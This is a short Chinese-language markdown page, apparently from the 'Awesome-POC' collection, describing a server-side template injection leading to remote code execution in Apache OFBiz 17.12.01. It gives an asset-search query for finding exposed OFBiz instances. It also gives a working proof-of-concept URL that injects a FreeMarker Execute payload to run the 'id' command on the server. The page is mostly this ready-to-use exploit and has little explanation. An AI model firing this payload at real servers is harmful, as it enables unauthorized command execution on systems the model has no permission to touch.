Awesome-POC/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
2024-11-06 14:10:36 +08:00

478 B
Raw Permalink Blame History

Apache OfBiz 远程代码执行 RCE

漏洞描述

Apache OfBiz 17.12.01 容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE

参考链接:

网络测绘

app="Apache_OFBiz"

漏洞复现

poc

https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO